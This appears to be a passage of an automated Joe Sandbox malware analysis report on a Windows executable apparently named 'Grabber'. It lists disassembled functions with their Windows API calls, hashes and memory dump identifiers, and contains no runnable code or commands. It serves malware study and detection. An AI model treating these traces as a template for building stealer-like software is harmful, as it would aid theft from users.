                                                                                                                                                                                                                          • API ID: FreeLibrarywcscatwcslen$AddressAllocHeapLoadProcTaskValuewcscpy
                                                                                                                                                                                                                          • String ID: Downloads\$SHGetKnownFolderPath$Shell32.DLL
                                                                                                                                                                                                                          • API String ID: 1740785346-287042676
                                                                                                                                                                                                                          • Opcode ID: ace73f6e0916171b361586c2bbf184c955ba55397e49a90223a244ca9597bb20
                                                                                                                                                                                                                          • Instruction ID: ae609db33c227b916d8c96984f24cc4820d8d1ee700964f601e6ad2a5a3ba7d8
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ace73f6e0916171b361586c2bbf184c955ba55397e49a90223a244ca9597bb20
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C821F871344701B6D2303B62EC4EF6F2A78DB91B90F11483BF901B51D2D6BC8A6199AF
                                                                                                                                                                                                                          Function 00412082 Relevance: 19.6, APIs: 13, Instructions: 74memoryregistrythreadCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • TlsAlloc.KERNEL32(?,?,0040E018,0040DF80,00000000,?,00402F4D,00000000,00000000,00000000,00000000,?,0040117C,00000000,00000000,00000004), ref: 00412092
                                                                                                                                                                                                                          • InitializeCriticalSection.KERNEL32(00418688,?,?,0040E018,0040DF80,00000000,?,00402F4D,00000000,00000000,00000000,00000000,?,0040117C,00000000,00000000), ref: 0041209E
                                                                                                                                                                                                                          • TlsGetValue.KERNEL32(?,?,0040E018,0040DF80,00000000,?,00402F4D,00000000,00000000,00000000,00000000,?,0040117C,00000000,00000000,00000004), ref: 004120B4
                                                                                                                                                                                                                          • HeapAlloc.KERNEL32(00000008,00000014,?,?,0040E018,0040DF80,00000000,?,00402F4D,00000000,00000000,00000000,00000000,?,0040117C,00000000), ref: 004120CE
                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(00418688,?,?,0040E018,0040DF80,00000000,?,00402F4D,00000000,00000000,00000000,00000000,?,0040117C,00000000,00000000), ref: 004120DF
                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(00418688,?,?,?,0040E018,0040DF80,00000000,?,00402F4D,00000000,00000000,00000000,00000000,?,0040117C,00000000), ref: 004120FB
                                                                                                                                                                                                                          • GetCurrentProcess.KERNEL32(00000000,00100000,00000000,00000000,?,?,?,0040E018,0040DF80,00000000,?,00402F4D,00000000,00000000,00000000,00000000), ref: 00412114
                                                                                                                                                                                                                          • GetCurrentThread.KERNEL32 ref: 00412117
                                                                                                                                                                                                                          • GetCurrentProcess.KERNEL32(00000000,?,?,?,0040E018,0040DF80,00000000,?,00402F4D,00000000,00000000,00000000,00000000,?,0040117C,00000000), ref: 0041211E
                                                                                                                                                                                                                          • DuplicateHandle.KERNEL32(00000000,?,?,?,0040E018,0040DF80,00000000,?,00402F4D,00000000,00000000,00000000,00000000,?,0040117C,00000000), ref: 00412121
                                                                                                                                                                                                                          • RegisterWaitForSingleObject.KERNEL32(0000000C,00000000,0041217A,00000000,000000FF,00000008), ref: 00412137
                                                                                                                                                                                                                          • TlsSetValue.KERNEL32(00000000,?,?,?,0040E018,0040DF80,00000000,?,00402F4D,00000000,00000000,00000000,00000000,?,0040117C,00000000), ref: 00412144
                                                                                                                                                                                                                          • HeapAlloc.KERNEL32(00000000,0000000C,?,?,0040E018,0040DF80,00000000,?,00402F4D,00000000,00000000,00000000,00000000,?,0040117C,00000000), ref: 00412155
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2113814027.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113799571.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113831938.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113847704.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113861201.0000000000419000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Grabber.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: AllocCriticalCurrentSection$HeapProcessValue$DuplicateEnterHandleInitializeLeaveObjectRegisterSingleThreadWait
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 298514914-0
                                                                                                                                                                                                                          • Opcode ID: 090f9e8ec264e5d12bc44ccd603b7065f48900f7029304d299a0ea3cd3686378
                                                                                                                                                                                                                          • Instruction ID: d80fd07e77255670f12a4e616af7295cf706cbaed93ad9a0fedfb01b657d880b
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 090f9e8ec264e5d12bc44ccd603b7065f48900f7029304d299a0ea3cd3686378
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 35211971644305FFDB119F64ED88B963FBAFB49311F04C43AFA09962A1CBB49850DB68
                                                                                                                                                                                                                          Function 00403275 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 176COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetWindowsDirectoryW.KERNEL32(00000000,00000800,00000000,00000800,00000000,00000000,?,00000000,00000000), ref: 00403302
                                                                                                                                                                                                                          • PathAddBackslashW.SHLWAPI(00000000,00000000,00000800,00000000,00000800,00000000,00000000,?,00000000,00000000), ref: 0040330B
                                                                                                                                                                                                                          • GetSystemDirectoryW.KERNEL32(00000000,00000800), ref: 0040342B
                                                                                                                                                                                                                          • PathAddBackslashW.SHLWAPI(00000000,00000000,00000800,00000000,00000800,00000000,00000000,00000000,00000800,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00403434
                                                                                                                                                                                                                            • Part of subcall function 0040DEC0: RtlReAllocateHeap.NTDLL(02190000,00000000,?,?), ref: 0040DF1C
                                                                                                                                                                                                                          • PathAddBackslashW.SHLWAPI(00000000,00000000,sysnative,00000000,00000000,00000000,00000000,00000800,00000000,00000800,00000000,00000000,?,00000000,00000000), ref: 0040333B
                                                                                                                                                                                                                            • Part of subcall function 0040DE80: GetLastError.KERNEL32(00001000,00000000,00000000), ref: 0040DE86
                                                                                                                                                                                                                            • Part of subcall function 0040DE80: TlsGetValue.KERNEL32(0000000D), ref: 0040DE95
                                                                                                                                                                                                                            • Part of subcall function 0040DE80: SetLastError.KERNEL32(?), ref: 0040DEAB
                                                                                                                                                                                                                            • Part of subcall function 0040DEC0: TlsGetValue.KERNEL32(0000000D,00000000,00000000), ref: 0040DECC
                                                                                                                                                                                                                            • Part of subcall function 0040DEC0: RtlAllocateHeap.NTDLL(02190000,00000000,?), ref: 0040DEF9
                                                                                                                                                                                                                          • GetSystemDirectoryW.KERNEL32(00000000,00000800), ref: 00403468
                                                                                                                                                                                                                          • PathAddBackslashW.SHLWAPI(00000000,00000000,00000800,00000000,00000000,?,00000000,00000000), ref: 00403471
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2113814027.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113799571.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113831938.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113847704.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113861201.0000000000419000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Grabber.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: BackslashPath$Directory$AllocateErrorHeapLastSystemValue$Windows
                                                                                                                                                                                                                          • String ID: sysnative
                                                                                                                                                                                                                          • API String ID: 3406704365-821172135
                                                                                                                                                                                                                          • Opcode ID: e5455a9928b97281f132b1c2dd1bbabf065e779dbb70284d860f41b952fb8df8
                                                                                                                                                                                                                          • Instruction ID: 2364f58bb10a159e0aa11294c57d56a9f179ba7a21fd77f55822fae8b4f54734
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e5455a9928b97281f132b1c2dd1bbabf065e779dbb70284d860f41b952fb8df8
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F5514075518701AAD600BBB2CC82B2F76A9AFD0709F10CC3FF544790D2CA7CD8599A6E
                                                                                                                                                                                                                          Function 0040DA43 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 53librarysleeploaderCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • LoadLibraryW.KERNEL32(Kernel32.dll,00000000,00000000,00000000,00000004,00000000,0040D855,0041861C,0040D9E2,00000000,FFFFFFED,00000200,76EC5E70,00409E76,FFFFFFED,00000010), ref: 0040DA51
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,InitOnceExecuteOnce), ref: 0040DA66
                                                                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000,?,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000,00000000,00000000), ref: 0040DA81
                                                                                                                                                                                                                          • InterlockedCompareExchange.KERNEL32(00000000,00000001,00000000), ref: 0040DA90
                                                                                                                                                                                                                          • Sleep.KERNEL32(00000000,?,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000,00000000,00000000), ref: 0040DAA2
                                                                                                                                                                                                                          • InterlockedExchange.KERNEL32(00000000,00000002), ref: 0040DAB5
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2113814027.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113799571.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113831938.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113847704.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113861201.0000000000419000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Grabber.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ExchangeInterlockedLibrary$AddressCompareFreeLoadProcSleep
                                                                                                                                                                                                                          • String ID: InitOnceExecuteOnce$Kernel32.dll
                                                                                                                                                                                                                          • API String ID: 2918862794-1339284965
                                                                                                                                                                                                                          • Opcode ID: 04ec49063c38c3d68cea197a5330db743d42037b633bf3bb84411c831da1e2b1
                                                                                                                                                                                                                          • Instruction ID: e7d3430369b103de8e34323ddaa6381870798cc52ac97d2691a1b23ef8b22f52
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 04ec49063c38c3d68cea197a5330db743d42037b633bf3bb84411c831da1e2b1
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A701B132748204BAD7116FE49C49FEB3B29EF42762F10813AF905A11C0DB7C49458A6D
                                                                                                                                                                                                                          Function 00409507 Relevance: 12.0, APIs: 8, Instructions: 50threadwindowCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetWindowThreadProcessId.USER32(?,00000000), ref: 00409511
                                                                                                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0040951F
                                                                                                                                                                                                                          • IsWindowVisible.USER32(?), ref: 00409526
                                                                                                                                                                                                                            • Part of subcall function 0040DB72: HeapAlloc.KERNEL32(00000008,00000000,0040D3EC,00418610,00000014,?,?,?,?,00409674,00000010,00000000,00000000,00401071,00000000,00001000), ref: 0040DB7E
                                                                                                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00409543
                                                                                                                                                                                                                          • GetWindowLongW.USER32(?,000000EC), ref: 00409550
                                                                                                                                                                                                                          • GetForegroundWindow.USER32 ref: 0040955E
                                                                                                                                                                                                                          • IsWindowEnabled.USER32(?), ref: 00409569
                                                                                                                                                                                                                          • EnableWindow.USER32(?,00000000), ref: 00409579
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2113814027.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113799571.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113831938.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113847704.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113861201.0000000000419000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Grabber.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Window$Thread$Current$AllocEnableEnabledForegroundHeapLongProcessVisible
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3383493704-0
                                                                                                                                                                                                                          • Opcode ID: 761db0cbe0c8efe4181c57131f09a45cb1cea28f7de62a6f083fb5992236dbff
                                                                                                                                                                                                                          • Instruction ID: 9be2ebae674c1fa36b8fc713cd4e728ef3198b0ad07c7790c0b3041e5f2a4f9d
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 761db0cbe0c8efe4181c57131f09a45cb1cea28f7de62a6f083fb5992236dbff
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A901B9315083016FD3215B769C88AABBAB8AF55750B04C03EF456D3191D7749C40C66D
                                                                                                                                                                                                                          Function 00408EB4 Relevance: 10.6, APIs: 7, Instructions: 54memoryCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • DestroyWindow.USER32(?), ref: 00408EED
                                                                                                                                                                                                                          • GetWindowLongW.USER32(?,000000EB), ref: 00408EFC
                                                                                                                                                                                                                          • GetWindowTextLengthW.USER32 ref: 00408F0A
                                                                                                                                                                                                                          • HeapAlloc.KERNEL32(00000000), ref: 00408F1F
                                                                                                                                                                                                                          • GetWindowTextW.USER32(00000000,00000001), ref: 00408F2F
                                                                                                                                                                                                                          • DestroyWindow.USER32(?), ref: 00408F3D
                                                                                                                                                                                                                          • UnregisterClassW.USER32 ref: 00408F53
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2113814027.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113799571.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113831938.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113847704.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113861201.0000000000419000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Grabber.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Window$DestroyText$AllocClassHeapLengthLongUnregister
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2895088630-0
                                                                                                                                                                                                                          • Opcode ID: cc61bfd3fa705e2cc6efe011ffba927a9334bb0a4f310b6a0f05db5f7333bb42
                                                                                                                                                                                                                          • Instruction ID: dcdd979020c5d84d31bdac08dec077088d7257a56d77306a58cab45369b049af
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cc61bfd3fa705e2cc6efe011ffba927a9334bb0a4f310b6a0f05db5f7333bb42
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C611183110810ABFCB116F64ED4C9E63F76EB08361B00C53AF44592AB0CF359955EB58
                                                                                                                                                                                                                          Function 00409588 Relevance: 9.1, APIs: 6, Instructions: 68threadCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • EnumWindows.USER32(00409507,?), ref: 0040959B
                                                                                                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 004095B3
                                                                                                                                                                                                                          • SetWindowPos.USER32(?,000000FE,00000000,00000000,00000000,00000000,00000003,?,?,?,?,?), ref: 004095CF
                                                                                                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 004095EF
                                                                                                                                                                                                                          • EnableWindow.USER32(?,00000001), ref: 00409605
                                                                                                                                                                                                                          • SetWindowPos.USER32(?,000000FF,00000000,00000000,00000000,00000000,00000003,?,?,?,?,?), ref: 0040961C
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2113814027.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113799571.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113831938.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113847704.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113861201.0000000000419000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Grabber.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Window$CurrentThread$EnableEnumWindows
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2527101397-0
                                                                                                                                                                                                                          • Opcode ID: f28d4ca554cd3ae9a733ad6cb4d62ecbd868711740a6e1fed135e0e6fc6d1c23
                                                                                                                                                                                                                          • Instruction ID: f5a6386b144a933a28a8080deaf79be6790ca9cb7a06763c23f847dded1acd22
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f28d4ca554cd3ae9a733ad6cb4d62ecbd868711740a6e1fed135e0e6fc6d1c23
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3E11AF32548741BBD7324B16EC48F577BB9EB81B20F14CA3EF052226E1DB766D44CA18
                                                                                                                                                                                                                          Function 0040D353 Relevance: 9.1, APIs: 6, Instructions: 66memoryCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • TlsAlloc.KERNEL32(?,?,?,?,00409674,00000010,00000000,00000000,00401071,00000000,00001000,00000000,00000000), ref: 0040D378
                                                                                                                                                                                                                          • HeapAlloc.KERNEL32(00000008,00000000,?,?,?,?,00409674,00000010,00000000,00000000,00401071,00000000,00001000,00000000,00000000), ref: 0040D38C
                                                                                                                                                                                                                          • TlsSetValue.KERNEL32(00000000,?,?,?,?,00409674,00000010,00000000,00000000,00401071,00000000,00001000,00000000,00000000), ref: 0040D399
                                                                                                                                                                                                                          • TlsGetValue.KERNEL32(00000010,?,?,?,?,00409674,00000010,00000000,00000000,00401071,00000000,00001000,00000000,00000000), ref: 0040D3B0
                                                                                                                                                                                                                          • HeapReAlloc.KERNEL32(00000008,00000000,?,?,?,?,00409674,00000010,00000000,00000000,00401071,00000000,00001000,00000000,00000000), ref: 0040D3BF
                                                                                                                                                                                                                          • TlsSetValue.KERNEL32(00000000,?,?,?,?,00409674,00000010,00000000,00000000,00401071,00000000,00001000,00000000,00000000), ref: 0040D3CE
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2113814027.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113799571.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113831938.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113847704.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113861201.0000000000419000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Grabber.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: AllocValue$Heap
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2472784365-0
                                                                                                                                                                                                                          • Opcode ID: d4aa023bea7065d4958094be2e1b0a1f42a8661c5ef268aa00a39480e26025ae
                                                                                                                                                                                                                          • Instruction ID: 1e11015e4a25d7f5304c1c18fd55a95fd758b035f13ce6db6bcec7fc4f8c26ab
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d4aa023bea7065d4958094be2e1b0a1f42a8661c5ef268aa00a39480e26025ae
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 22116372A45310AFD7109FA5EC84A967BA9FB58760B05803EF904D33B2DB359C048AAC
                                                                                                                                                                                                                          Function 00412004 Relevance: 9.0, APIs: 6, Instructions: 45memoryCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • UnregisterWait.KERNEL32(?), ref: 0041200E
                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?,?,?,?,0041218A,?), ref: 00412017
                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(00418688,?,?,?,0041218A,?), ref: 00412023
                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(00418688,?,?,?,0041218A,?), ref: 00412048
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,00000000,?,?,?,0041218A,?), ref: 00412066
                                                                                                                                                                                                                          • HeapFree.KERNEL32(?,?,?,?,?,0041218A,?), ref: 00412078
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2113814027.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113799571.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113831938.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113847704.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113861201.0000000000419000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Grabber.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CriticalFreeHeapSection$CloseEnterHandleLeaveUnregisterWait
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 4204870694-0
                                                                                                                                                                                                                          • Opcode ID: 74c8b0c47b40b3dfa83cc76d0e2e37435eae102b1f5068a19a02dca3843f56c7
                                                                                                                                                                                                                          • Instruction ID: 90751bbfb1e58074f86cd24fa3ef9024ec02ad1f71581e15228f0d3cd8da5416
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 74c8b0c47b40b3dfa83cc76d0e2e37435eae102b1f5068a19a02dca3843f56c7
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F5012970201601EFC7249F11EE88A96BF75FF493557108539E61AC2A70C731A821DBA8
                                                                                                                                                                                                                          Function 004057F0 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 118COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • wcsncmp.MSVCRT ref: 00405853
                                                                                                                                                                                                                          • memmove.MSVCRT(00000000,00000000,?,00000000,00000000,?,?,-0000012C,?,?,004022A6,00000000,00000002,00000000,00000000,00417024), ref: 004058E1
                                                                                                                                                                                                                          • wcsncpy.MSVCRT ref: 004058F9
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2113814027.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113799571.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113831938.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113847704.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113861201.0000000000419000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Grabber.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: memmovewcsncmpwcsncpy
                                                                                                                                                                                                                          • String ID: $0A$$0A
                                                                                                                                                                                                                          • API String ID: 1452150355-167650565
                                                                                                                                                                                                                          • Opcode ID: d76f75147769cfeda3015acce6fec10c4d54059df292c5d7079ca0585360228a
                                                                                                                                                                                                                          • Instruction ID: fc6078814c183f32d07ee1b1bbfb59dc2b99a9263d9aed9d6ca5449e395b5937
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d76f75147769cfeda3015acce6fec10c4d54059df292c5d7079ca0585360228a
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4C31D536904B058BC720FF55888057B77A8EE84344F14893EEC85373C2EB799D61DBAA
                                                                                                                                                                                                                          Function 00405553 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 29libraryloaderCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00405562
                                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(ntdll.dll,?,?,00000000), ref: 00405571
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,RtlGetVersion), ref: 00405581
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2113814027.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113799571.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113831938.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113847704.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113861201.0000000000419000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Grabber.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: AddressHandleModuleProcmemset
                                                                                                                                                                                                                          • String ID: RtlGetVersion$ntdll.dll
                                                                                                                                                                                                                          • API String ID: 3137504439-1489217083
                                                                                                                                                                                                                          • Opcode ID: 6332086022332b991d2c4cf9c539ad8fbd8ac088d8322b57d3057784f2e87649
                                                                                                                                                                                                                          • Instruction ID: 30d66d9a54b09ec8b40df40bafdfba1d8cbaec4fc0a5d0b23e6a41b72964e000
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6332086022332b991d2c4cf9c539ad8fbd8ac088d8322b57d3057784f2e87649
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FAE09A3176461176C6202B76AC09FCB2AACDF8AB01B14043AB105E21C5E63C8A018ABD
                                                                                                                                                                                                                          Function 0040A043 Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 80memoryCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • wcslen.MSVCRT ref: 0040A0AB
                                                                                                                                                                                                                          • HeapAlloc.KERNEL32(00000000,00000000,00000000,00000001,?,?,?,00000000,00409ECC,?,?,00000000,?,?,00403C62), ref: 0040A0C1
                                                                                                                                                                                                                          • wcscpy.MSVCRT ref: 0040A0CC
                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040A0FA
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
